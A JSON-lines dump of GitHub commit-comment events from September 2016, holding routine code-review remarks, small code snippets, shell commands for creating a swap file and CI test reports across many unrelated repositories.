{"id":"4553349971","type":"CommitCommentEvent","actor":{"login":"gisner"},"repo":{"name":"Thaslim/FizzBuzz"},"payload":{"comment":{"id":18995785,"position":null,"line":null,"path":null,"commit_id":"bfbea9f09502aedc97d0891d3d2d9de05a622211","created_at":"2016-09-13T04:10:48Z","updated_at":"2016-09-13T04:10:48Z","body":"Line 13: The FizzBuzz assignment states that if a number is divisible by BOTH 3 and 5, then print fizzbuzz. The rest of the code looks good!"}},"created_at":"2016-09-13T04:10:48Z"}
{"id":"4553352223","type":"CommitCommentEvent","actor":{"login":"taoeffect"},"repo":{"name":"grempe/vue-script2"},"payload":{"comment":{"id":18995792,"position":null,"line":null,"path":null,"commit_id":"1cb92cfa3bf52ae9fdedb993daa533d8769c11c9","created_at":"2016-09-13T04:11:44Z","updated_at":"2016-09-13T04:11:44Z","body":"Well, did it fix the problem? ^_^"}},"created_at":"2016-09-13T04:11:44Z"}
{"id":"4553352465","type":"CommitCommentEvent","actor":{"login":"matthew-mcallister"},"repo":{"name":"ocf/ocfweb"},"payload":{"comment":{"id":18995793,"position":null,"line":null,"path":null,"commit_id":"cdcb818d644be71d1b97bc0c6dae3b22a0a1dd45","created_at":"2016-09-13T04:11:49Z","updated_at":"2016-09-13T04:11:49Z","body":"On the contrary, wheel is now equivalent to being in ocfstaff. No cron spam though."}},"created_at":"2016-09-13T04:11:49Z"}
{"id":"4553353090","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18995794,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T04:12:06Z","updated_at":"2016-09-13T04:12:06Z","body":"Yes, but these are swap files. I intentionally deleted all the swap partitions to use a swap file. On first boot, it will look for swap files in $PDEV1 as well.    Although I think the script should  always try to load a swap file if available.... \r\n\r\nNow i'll have add an option to create a swap file in shutdownconfig, if swap size = 0 (no swap partitions/files loaded).\r\n\r\nAny ideas are welcome.."}},"created_at":"2016-09-13T04:12:06Z"}
{"id":"4553354324","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995796,"position":null,"line":null,"path":null,"commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:12:37Z","updated_at":"2016-09-13T04:12:37Z","body":"Looks ok overall but I think we can compact it further. This looks like there's a good chunk of verbosity that can be removed."}},"created_at":"2016-09-13T04:12:37Z"}
{"id":"4553354770","type":"CommitCommentEvent","actor":{"login":"taoeffect"},"repo":{"name":"grempe/vue-script2"},"payload":{"comment":{"id":18995797,"position":4,"line":59,"path":"src/index.js","commit_id":"1cb92cfa3bf52ae9fdedb993daa533d8769c11c9","created_at":"2016-09-13T04:12:48Z","updated_at":"2016-09-13T04:12:48Z","body":"Oh... Man, that's so annoying."}},"created_at":"2016-09-13T04:12:48Z"}
{"id":"4553358224","type":"CommitCommentEvent","actor":{"login":"btamps"},"repo":{"name":"btamps/btamps.github.io"},"payload":{"comment":{"id":18995807,"position":null,"line":null,"path":null,"commit_id":"84e8307f03c7be0e55a8049e363857d30d95c62b","created_at":"2016-09-13T04:14:18Z","updated_at":"2016-09-13T04:14:18Z","body":"Added new thumb"}},"created_at":"2016-09-13T04:14:18Z"}
{"id":"4553358245","type":"CommitCommentEvent","actor":{"login":"pitiphong-p"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995808,"position":67,"line":67,"path":"OmiseSwift/List.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:14:18Z","updated_at":"2016-09-13T04:14:18Z","body":"Sounds great. I try to find the existing operators and don't see anyone fit this req orz"}},"created_at":"2016-09-13T04:14:18Z"}
{"id":"4553359729","type":"CommitCommentEvent","actor":{"login":"jak103"},"repo":{"name":"FabioCZ/jarvis"},"payload":{"comment":{"id":18995814,"position":null,"line":null,"path":null,"commit_id":"2ce09bd3db1cb1dc7ed65fdbcf3c2363f47a70d1","created_at":"2016-09-13T04:14:53Z","updated_at":"2016-09-13T04:14:53Z","body":"That's a lot of code for a pretty simple interface. I'm not sure how I feel about it."}},"created_at":"2016-09-13T04:14:53Z"}
{"id":"4553360331","type":"CommitCommentEvent","actor":{"login":"bgroenks96"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18995817,"position":30,"line":59,"path":"core/src/main/java/com/forerunnergames/peril/core/model/battle/DefaultAttackOrder.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T04:15:10Z","updated_at":"2016-09-13T04:15:10Z","body":"I wouldn't expect you to retroactively go back and fix it, but I do think significant formatting changes should be done in separate commits, if possible. Eclipse has a setting to only format lines of code I have changed, which is what I use. If I notice a class has a number of violations, I do an immediate follow up commit with a full auto-format.\r\n\r\nIt just makes these commit diffs _really really_ hard to read.... and there were a number of actual changes I would like to look at in here (they are to core code) but I can't spend the time sifting through everything because I have to do other things :(\r\n\r\nSo please, please make some effort to defer the formatting changes to a separate commit; don't \"put them off until later\" per se... just commit what you have, perform the auto-format, commit that, and then squash later.\r\n\r\n>unless it's something on a fairly large scale, affecting many files at once.\r\n\r\nSo this commit? :stuck_out_tongue_winking_eye: "}},"created_at":"2016-09-13T04:15:10Z"}
{"id":"4553361323","type":"CommitCommentEvent","actor":{"login":"wansco"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18995818,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-13T04:15:31Z","updated_at":"2016-09-13T04:15:31Z","body":"owasp has a good amount of info in the return --- result.optionalTestsPassed, but for the sake of progress bar values, it should be capped.\r\n\r\nFor the required test, it has the min length, max length and repeated characters (that one is not in the popover message). I'm going to treat this as a single pass/fail: if there are no required test failures, then it gets a tick on the progress bar. That plus the MIN(optionalTestsPassed, minOptionalTestsToPass) should fill out the progress bar. I can keep the fancy colors if I define the progress bar for 3 tests (the required \"one\" plus 2 optional), 4 tests (required + 3), and 5 (required + 5). That is getting a bit excessive in the code, but logic to dynamically define these with colors is getting overly complex.\r\n\r\n\r\n"}},"created_at":"2016-09-13T04:15:31Z"}
{"id":"4553364494","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/-MLPIII_C_2016_2_LISTA-"},"payload":{"comment":{"id":18995830,"position":null,"line":null,"path":null,"commit_id":"40e058eebd250f08a01584b03b497daed58fe439","created_at":"2016-09-13T04:16:51Z","updated_at":"2016-09-13T04:16:51Z","body":"package br.com.unipe.lista2;\r\nimport java.util.Scanner;\r\n\r\npublic abstract class Quadrilatero implements FiguraGeometrica { \r\nint lado1, lado2, lado3, lado4;\r\n\r\npublic Quadrilatero(int lado1, int lado2, int lado3, int lado4) { \r\nthis.lado1 = lado1; \r\nthis.lado2 = lado2; \r\nthis.lado3 = lado3; \r\nthis.lado4 = lado4; \r\n}\r\n\r\npublic void calcularArea(){ \r\n\r\n}\r\n\r\npublic void calcularPerimetro(){ \r\n \r\n} \r\n}\r\n"}},"created_at":"2016-09-13T04:16:51Z"}
{"id":"4553365540","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/-MLPIII_C_2016_2_LISTA-"},"payload":{"comment":{"id":18995834,"position":null,"line":null,"path":null,"commit_id":"40e058eebd250f08a01584b03b497daed58fe439","created_at":"2016-09-13T04:17:17Z","updated_at":"2016-09-13T04:17:17Z","body":"package br.com.unipe.lista2;\r\n\r\npublic class Circulo implements FormaGeomatrica {\r\n\t private double raio;\r\n\r\n\t public Circulo(double raio) {\r\n\t this.raio = raio;\r\n\t }\r\n\r\n\t public double perimetro() {\r\n\t return 2*Math.PI*raio;\r\n\t }\r\n\r\n\t public double area() {\r\n\t return Math.PI*raio*raio;\r\n\t }\r\n\r\n\t public double getRaio() {\r\n\t return raio;\r\n\t }\r\n\r\n\t public void setRaio(double raio) {\r\n\t this.raio = raio;\r\n\t }\r\n\r\n\t}\r\n"}},"created_at":"2016-09-13T04:17:17Z"}
{"id":"4553367433","type":"CommitCommentEvent","actor":{"login":"mehcode"},"repo":{"name":"jsntghf/rn-splash-screen"},"payload":{"comment":{"id":18995840,"position":null,"line":null,"path":null,"commit_id":"0aaa40fe94eaed3fbfb221156f6507e764c2790d","created_at":"2016-09-13T04:18:06Z","updated_at":"2016-09-13T04:18:06Z","body":"@dalancon Why did you need to change the drawable resource name?"}},"created_at":"2016-09-13T04:18:06Z"}
{"id":"4553369772","type":"CommitCommentEvent","actor":{"login":"zzzzpaul"},"repo":{"name":"jmentero/Spoon-Knife"},"payload":{"comment":{"id":18995848,"position":7,"line":7,"path":"README.md","commit_id":"6167e62b32ea624b97451b03965a5d97f3c57aa0","created_at":"2016-09-13T04:19:10Z","updated_at":"2016-09-13T04:19:10Z","body":"https://github.com/octocat/Spoon-Knife/pulls"}},"created_at":"2016-09-13T04:19:10Z"}
{"id":"4553376614","type":"CommitCommentEvent","actor":{"login":"mehcode"},"repo":{"name":"stephanemaillard/rn-splash-screen"},"payload":{"comment":{"id":18995855,"position":null,"line":null,"path":null,"commit_id":"c1e0362878fa2cd3330f05d82b3123a531ad1c4d","created_at":"2016-09-13T04:22:06Z","updated_at":"2016-09-13T04:22:06Z","body":"@stephanemaillard What does this do that it was not doing before?\r\n\r\nFrom your commit I see you want a \"full screen\" appearance. I'm not super-savvy in android so I don't know what this actually means but a quick search found this (which I think is much better as you're not dealing with Image views):\r\n\r\n```\r\n<style name=\"Theme.AppCompat.Light.NoActionBar.FullScreen\" parent=\"@style/Theme.AppCompat.Light\">\r\n    <item name=\"windowNoTitle\">true</item>\r\n    <item name=\"windowActionBar\">false</item>\r\n    <item name=\"android:windowFullscreen\">true</item>\r\n    <item name=\"android:windowContentOverlay\">@null</item>\r\n</style>\r\n```"}},"created_at":"2016-09-13T04:22:06Z"}
{"id":"4553378284","type":"CommitCommentEvent","actor":{"login":"a-stuteley"},"repo":{"name":"a-stuteley/a-stuteley.github.io"},"payload":{"comment":{"id":18995859,"position":5,"line":5,"path":"index.html","commit_id":"f643a57617a56112356def19fd65b99e9c675264","created_at":"2016-09-13T04:22:46Z","updated_at":"2016-09-13T04:22:46Z","body":"add style"}},"created_at":"2016-09-13T04:22:46Z"}
{"id":"4553380035","type":"CommitCommentEvent","actor":{"login":"alexwanjun"},"repo":{"name":"alexwanjun/console"},"payload":{"comment":{"id":18995860,"position":null,"line":null,"path":null,"commit_id":"b6251e008bb47969b9c0dfcb2e61ce4bb3ace34e","created_at":"2016-09-13T04:23:29Z","updated_at":"2016-09-13T04:23:29Z","body":"dfjsdlkjfk"}},"created_at":"2016-09-13T04:23:29Z"}
{"id":"4553380421","type":"CommitCommentEvent","actor":{"login":"marleyrl"},"repo":{"name":"abhishek70/Share-Rides-Android-App"},"payload":{"comment":{"id":18995863,"position":null,"line":null,"path":null,"commit_id":"94c3bfebae5908ef1374ce6d689a966d9f4361bc","created_at":"2016-09-13T04:23:39Z","updated_at":"2016-09-13T04:23:39Z","body":"Hii ! \r\n\r\nThis line of your code shows the error:\r\n\r\n**# _Parse.initialize(new Parse.Configuration.Builder(getApplicationContext()).applicationId(Configs.APPLICATION_ID).clientKey(null).server(Configs.APPLICATION_URL).build());_**\r\n\r\nBecause this missing the following import: **import com.example.abhishek.sharerides.helpers.Configs;**\r\n\r\nErros:\r\n- Configs.APPLICATION_ID\r\n- Configs.APPLICATION_URL\r\n\r\nIt is possible to send the configuration of your parser database ?\r\nThanks ^^\r\n\r\n"}},"created_at":"2016-09-13T04:23:39Z"}
{"id":"4553382497","type":"CommitCommentEvent","actor":{"login":"jwhui"},"repo":{"name":"openthread/openthread"},"payload":{"comment":{"id":18995865,"position":10,"line":132,"path":"src/core/thread/meshcop_dataset.cpp","commit_id":"8efecb9ae8d6aa32f7ebd4d469fa29a30f78aa1e","created_at":"2016-09-13T04:24:32Z","updated_at":"2016-09-13T04:24:32Z","body":"The channel mask is encoded in little-endian (least-significant bit of the first byte is channel 0)."}},"created_at":"2016-09-13T04:24:32Z"}
{"id":"4553382636","type":"CommitCommentEvent","actor":{"login":"jwhui"},"repo":{"name":"openthread/openthread"},"payload":{"comment":{"id":18995866,"position":28,"line":271,"path":"src/core/thread/meshcop_dataset.cpp","commit_id":"8efecb9ae8d6aa32f7ebd4d469fa29a30f78aa1e","created_at":"2016-09-13T04:24:36Z","updated_at":"2016-09-13T04:24:36Z","body":"The channel mask is encoded in little-endian (least-significant bit of the first byte is channel 0)."}},"created_at":"2016-09-13T04:24:36Z"}
{"id":"4553383431","type":"CommitCommentEvent","actor":{"login":"nigrosimone"},"repo":{"name":"szepeviktor/fix-w3tc"},"payload":{"comment":{"id":18995868,"position":null,"line":null,"path":null,"commit_id":"815a0b1a94053ebc694077db77b74b6e009c975d","created_at":"2016-09-13T04:24:55Z","updated_at":"2016-09-13T04:24:55Z","body":"You have added the query string to the key for the cache,  is it correct? "}},"created_at":"2016-09-13T04:24:55Z"}
{"id":"4553384855","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":18995872,"position":null,"line":null,"path":null,"commit_id":"96f0bbe91d2176284324c4d9b4839b6878148602","created_at":"2016-09-13T04:25:31Z","updated_at":"2016-09-13T04:25:31Z","body":"Then why leave \"dropbear\" in?\r\nJust \"SSH-2.0-server\" would give even more security by obscurity ;)"}},"created_at":"2016-09-13T04:25:31Z"}
{"id":"4553387624","type":"CommitCommentEvent","actor":{"login":"bgroenks96"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18995874,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T04:26:48Z","updated_at":"2016-09-13T04:26:48Z","body":"Was BattleSetupEvent/BattleResultEvent your idea? I don't remember that being in my design."}},"created_at":"2016-09-13T04:26:48Z"}
{"id":"4553388929","type":"CommitCommentEvent","actor":{"login":"njustyangkai"},"repo":{"name":"ng-bootstrap/ng-bootstrap"},"payload":{"comment":{"id":18995877,"position":18,"line":98,"path":"misc/api-doc.js","commit_id":"d0c51fc3d965d43fc7e3f8a2bd86826f9047894d","created_at":"2016-09-13T04:27:23Z","updated_at":"2016-09-13T04:27:23Z","body":"test"}},"created_at":"2016-09-13T04:27:23Z"}
{"id":"4553390223","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":18995881,"position":null,"line":null,"path":null,"commit_id":"2ea15dba8be2290637d305e71effeff0915accdc","created_at":"2016-09-13T04:27:56Z","updated_at":"2016-09-13T04:27:56Z","body":";/"}},"created_at":"2016-09-13T04:27:56Z"}
{"id":"4553391000","type":"CommitCommentEvent","actor":{"login":"rhoboro"},"repo":{"name":"pyconjp/pyconjp-android"},"payload":{"comment":{"id":18995884,"position":19,"line":23,"path":"app/src/main/java/jp/pycon/pyconjp2016app/Feature/About/AboutOrganizer/Adapter/AboutPagerAdapter.java","commit_id":"d26da3175f539c53fbfcddab3448c68eff146b21","created_at":"2016-09-13T04:28:16Z","updated_at":"2016-09-13T04:28:16Z","body":"Activityではなく、Contextにしてください"}},"created_at":"2016-09-13T04:28:16Z"}
{"id":"4553392145","type":"CommitCommentEvent","actor":{"login":"rhoboro"},"repo":{"name":"pyconjp/pyconjp-android"},"payload":{"comment":{"id":18995887,"position":19,"line":23,"path":"app/src/main/java/jp/pycon/pyconjp2016app/Feature/About/AboutOrganizer/Adapter/AboutPagerAdapter.java","commit_id":"d26da3175f539c53fbfcddab3448c68eff146b21","created_at":"2016-09-13T04:28:46Z","updated_at":"2016-09-13T04:28:46Z","body":"基本的にActivityを強参照で保持するのは避けたほうがいいです"}},"created_at":"2016-09-13T04:28:46Z"}
{"id":"4553394918","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/NodeGoat"},"payload":{"comment":{"id":18995892,"position":null,"line":null,"path":null,"commit_id":"2c596c1042aef675a1db2620791dcafd949615ba","created_at":"2016-09-13T04:30:01Z","updated_at":"2016-09-13T04:30:01Z","body":"Output of:\r\n`docker ps --quiet | xargs docker inspect --format '{{ .Id }}: User={{.Config.User}}'`\r\n\r\nyields:\r\n\r\n```\r\n<web container hash>: User=nodegoat_docker\r\n<mongo container hash>: User=mongodb\r\n```"}},"created_at":"2016-09-13T04:30:01Z"}
{"id":"4553398044","type":"CommitCommentEvent","actor":{"login":"abatishchev"},"repo":{"name":"abatishchev/jwt"},"payload":{"comment":{"id":18995895,"position":null,"line":null,"path":null,"commit_id":"21d059f9c557aa67b8a207f7a1cdf39735fd5a37","created_at":"2016-09-13T04:31:21Z","updated_at":"2016-09-13T04:31:21Z","body":"hi @siuccwd, I almost got the write permissions to the main Jwt.Net project. Would you like to join the effort to review again and merge this PR into mater?"}},"created_at":"2016-09-13T04:31:21Z"}
{"id":"4553399933","type":"CommitCommentEvent","actor":{"login":"amiga-500"},"repo":{"name":"szepeviktor/fix-w3tc"},"payload":{"comment":{"id":18995899,"position":null,"line":null,"path":null,"commit_id":"815a0b1a94053ebc694077db77b74b6e009c975d","created_at":"2016-09-13T04:32:10Z","updated_at":"2016-09-13T04:32:10Z","body":"Yes it is added back _if and only_ if it exists.  My intent was to keep the url to as close to its original form as possible because prior to this update the original code:\r\n```php\r\n$is_ssl_request = ( strtolower(substr($request_uri, 0, 8)) == 'https://' );\r\n$key = substr( $request_uri, $is_ssl_request ? 8 : 7 );\r\n```\r\nwas doing the same thing (preserving as much of the full request uri) but only stripping out the scheme.\r\n\r\nSo i figured if a query string was still present when i parsed the url the it was probably best to put it back (if it existed)."}},"created_at":"2016-09-13T04:32:10Z"}
{"id":"4553400368","type":"CommitCommentEvent","actor":{"login":"julien731"},"repo":{"name":"Awesome-Support/Awesome-Support"},"payload":{"comment":{"id":18995900,"position":null,"line":null,"path":null,"commit_id":"14a66a1195f6f305bd0ff68f7fa50cad60af8bc4","created_at":"2016-09-13T04:32:20Z","updated_at":"2016-09-13T04:32:20Z","body":"We are currently testing the new version on our own support site. Once everything is stable we will release the update. This should be coming within this month."}},"created_at":"2016-09-13T04:32:20Z"}
{"id":"4553404616","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"davisagli/collective.sticky"},"payload":{"comment":{"id":18995903,"position":null,"line":null,"path":null,"commit_id":"3951a722940ffa5941d06feeaf176282511f2366","created_at":"2016-09-13T04:34:09Z","updated_at":"2016-09-13T04:34:09Z","body":":+1:"}},"created_at":"2016-09-13T04:34:09Z"}
{"id":"4553405147","type":"CommitCommentEvent","actor":{"login":"muniv"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":18995904,"position":9,"line":21,"path":"app/mailers/parti_mailer.rb","commit_id":"1b788da5b7ccfd99f4f03aa6229cb44d40dd18df","created_at":"2016-09-13T04:34:24Z","updated_at":"2016-09-13T04:34:24Z","body":"\"#{I18n.l Date.yesterday} #{subject}\" 이렇게요? 더 보기 좋은 것 같습니다"}},"created_at":"2016-09-13T04:34:24Z"}
{"id":"4553413110","type":"CommitCommentEvent","actor":{"login":"braydonf"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":18995927,"position":null,"line":null,"path":null,"commit_id":"7b5806fef25ac3c50d96e3a15e4e412d3db7d008","created_at":"2016-09-13T04:38:01Z","updated_at":"2016-09-13T04:38:01Z","body":"+1, I ran into this issue, this should be helpful"}},"created_at":"2016-09-13T04:38:01Z"}
{"id":"4553415712","type":"CommitCommentEvent","actor":{"login":"OxforDroid"},"repo":{"name":"OxforDroid/My_Test"},"payload":{"comment":{"id":18995934,"position":11,"line":13,"path":"app/src/main/java/ru/keke/myapplication1109/MainActivity.java","commit_id":"e3dcb938911f640a43b74f7e0f0bd5bc1c7617ad","created_at":"2016-09-13T04:39:15Z","updated_at":"2016-09-13T04:39:15Z","body":"sgfsd"}},"created_at":"2016-09-13T04:39:15Z"}
{"id":"4553416118","type":"CommitCommentEvent","actor":{"login":"colemickens"},"repo":{"name":"rpwoodbu/mosh-chrome"},"payload":{"comment":{"id":18995935,"position":null,"line":null,"path":null,"commit_id":"11e421fec6ca196a38768a36c9c2dbcf376961b1","created_at":"2016-09-13T04:39:26Z","updated_at":"2016-09-13T04:39:26Z","body":"This is fantastic. Mosh App for Chrome is the best option for terminal emulator on Windows right now, glad to see it has a future beyond Chrome Apps support in Windows! Thanks for all your hard work, this is an exquisite app!"}},"created_at":"2016-09-13T04:39:26Z"}
{"id":"4553419385","type":"CommitCommentEvent","actor":{"login":"zhjc1124"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18995941,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-13T04:40:49Z","updated_at":"2016-09-13T04:40:49Z","body":"南湖的冒个泡=.=话说把我昵称打错了 @dzxx36gyy "}},"created_at":"2016-09-13T04:40:49Z"}
{"id":"4553419498","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":18995942,"position":80,"line":80,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-13T04:40:52Z","updated_at":"2016-09-13T04:40:52Z","body":"I know what is it. But my question is why? If you call this function, you'd expect that is will set it."}},"created_at":"2016-09-13T04:40:52Z"}
{"id":"4553423133","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18995953,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-13T04:42:26Z","updated_at":"2016-09-13T04:42:26Z","body":"@zhjc1124 _(:з」∠)_……这很尴尬，可能是某些神秘力量使你-1s了"}},"created_at":"2016-09-13T04:42:26Z"}
{"id":"4553425784","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18995957,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T04:43:37Z","updated_at":"2016-09-13T04:43:37Z","body":"There are 3 possible locations:\r\n\r\n/initrd${PUP_HOME}/pupswap.swp - this is in a frugal install\r\n/pupswap.swp - this can be handy in a full install or any install\r\n-- if none of the above were found, then --\r\n/mnt/${PDEV1}/pupswap.swp - basically for pupmode 5, tested in a frugal install\r\n\r\nto manually create the file (1GB swap file):\r\n\r\ndd if=/dev/zero of=pupswap.swp bs=1M count=1024\r\nmkswap pupswap.swp\r\n\r\nthen place it in the correct dir.."}},"created_at":"2016-09-13T04:43:37Z"}
{"id":"4553427181","type":"CommitCommentEvent","actor":{"login":"DominusExult"},"repo":{"name":"aaronj1335/textual-sulaco"},"payload":{"comment":{"id":18995962,"position":null,"line":null,"path":null,"commit_id":"46ce954a6ac1c6282d2b359cead8b90ad8089b64","created_at":"2016-09-13T04:44:20Z","updated_at":"2016-09-13T04:44:20Z","body":"The Textual dev makes you add a callback to app objects now.\r\nSee https://help.codeux.com/textual/release-notes/Style-Developers:-Migrating-to-6.0.0.kb at the bottom."}},"created_at":"2016-09-13T04:44:20Z"}
{"id":"4553428504","type":"CommitCommentEvent","actor":{"login":"Nelidon"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18995970,"position":120,"line":1907,"path":"src/server/game/Entities/Item/Item.cpp","commit_id":"a78aa3cf4ef3f33903ec9f06d8fdc46e81c51cb3","created_at":"2016-09-13T04:44:56Z","updated_at":"2016-09-13T04:44:56Z","body":"UPDATE_OBJECT not build correctly when you are using transmogrification. The client sends also to the server the CMSG_OBJECT_UPDATE_FAILED."}},"created_at":"2016-09-13T04:44:56Z"}
{"id":"4553429773","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/NodeGoat"},"payload":{"comment":{"id":18995975,"position":null,"line":null,"path":null,"commit_id":"37b8a3a34a7c343adc6bc19a5b6e4f25b039ed15","created_at":"2016-09-13T04:45:31Z","updated_at":"2016-09-13T04:45:31Z","body":"Output of:\r\ndocker ps --quiet | xargs docker inspect --format '{{ .Id }}: User={{.Config.User}}'\r\n\r\nyields:\r\n\r\n<web container hash>: User=nodegoat_docker\r\n<mongo container hash>: User=mongo_docker\r\nThe original Dockerfile is here: https://github.com/docker-library/mongo/blob/4d7bd01562edefad38a240c40a4b162a1cd7b9c2/3.2/Dockerfile"}},"created_at":"2016-09-13T04:45:31Z"}
{"id":"4553430649","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18995976,"position":61,"line":60,"path":"HelloWorld/Program.cs","commit_id":"cd1de5be6f6418f3cf407150f3d093fb4237ad1d","created_at":"2016-09-13T04:45:54Z","updated_at":"2016-09-13T04:45:54Z","body":"Мы проверяем некое булевое выражение и когда оно истино возвращаем true, а когда оно ложно - false. Не сложно заметить, что с таким же успехом мы могли бы просто возвращать само значение булева выражения, без if-else."}},"created_at":"2016-09-13T04:45:54Z"}
{"id":"4553433316","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18995982,"position":null,"line":null,"path":null,"commit_id":"250df8f6857fbab72b52dd72c041957e310433f7","created_at":"2016-09-13T04:47:06Z","updated_at":"2016-09-13T04:47:06Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2166 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-250df8f6857fbab72b52dd72c041957e310433f7-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-250df8f6857fbab72b52dd72c041957e310433f7-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-87.83%25-red.svg)</a> \n"}},"created_at":"2016-09-13T04:47:06Z"}
{"id":"4553433983","type":"CommitCommentEvent","actor":{"login":"MenoData"},"repo":{"name":"MenoData/Time4J"},"payload":{"comment":{"id":18995985,"position":null,"line":null,"path":null,"commit_id":"06bc980b7c1f864950f6f86878f56424bfe1b274","created_at":"2016-09-13T04:47:24Z","updated_at":"2016-09-13T04:47:24Z","body":"see issue #550 "}},"created_at":"2016-09-13T04:47:24Z"}
{"id":"4553434600","type":"CommitCommentEvent","actor":{"login":"AlexisDrogoul"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":18995987,"position":null,"line":null,"path":null,"commit_id":"80d3a372d6012f0f0478a29afada34ffca688719","created_at":"2016-09-13T04:47:40Z","updated_at":"2016-09-13T04:47:40Z","body":"Maybe `keystone` would be better for the keyword, no ? "}},"created_at":"2016-09-13T04:47:40Z"}
{"id":"4553435394","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995989,"position":null,"line":null,"path":null,"commit_id":"28b86783534312790d5c32043c521ca649e10746","created_at":"2016-09-13T04:48:00Z","updated_at":"2016-09-13T04:48:00Z","body":"Related to: backdrop/backdrop-issues#2167 "}},"created_at":"2016-09-13T04:48:00Z"}
{"id":"4553435406","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995990,"position":null,"line":null,"path":null,"commit_id":"a94bab84a16c274be3769dc82153cb3462536519","created_at":"2016-09-13T04:48:00Z","updated_at":"2016-09-13T04:48:00Z","body":"Related to: backdrop/backdrop-issues#2167 "}},"created_at":"2016-09-13T04:48:00Z"}
{"id":"4553435416","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995991,"position":null,"line":null,"path":null,"commit_id":"e9cdf48f3c4b4abddf73fbd53217dbfd3b750c5f","created_at":"2016-09-13T04:48:00Z","updated_at":"2016-09-13T04:48:00Z","body":"Related to: backdrop/backdrop-issues#2166 "}},"created_at":"2016-09-13T04:48:00Z"}
{"id":"4553435421","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995992,"position":null,"line":null,"path":null,"commit_id":"556f62cd02e5b0217edfec18cd241a6050fa0313","created_at":"2016-09-13T04:48:00Z","updated_at":"2016-09-13T04:48:00Z","body":"Related to: backdrop/backdrop-issues#2165 "}},"created_at":"2016-09-13T04:48:00Z"}
{"id":"4553435433","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995993,"position":null,"line":null,"path":null,"commit_id":"5b51263350798d9d8cd00800d463192ef9ccf01f","created_at":"2016-09-13T04:48:00Z","updated_at":"2016-09-13T04:48:00Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-13T04:48:00Z"}
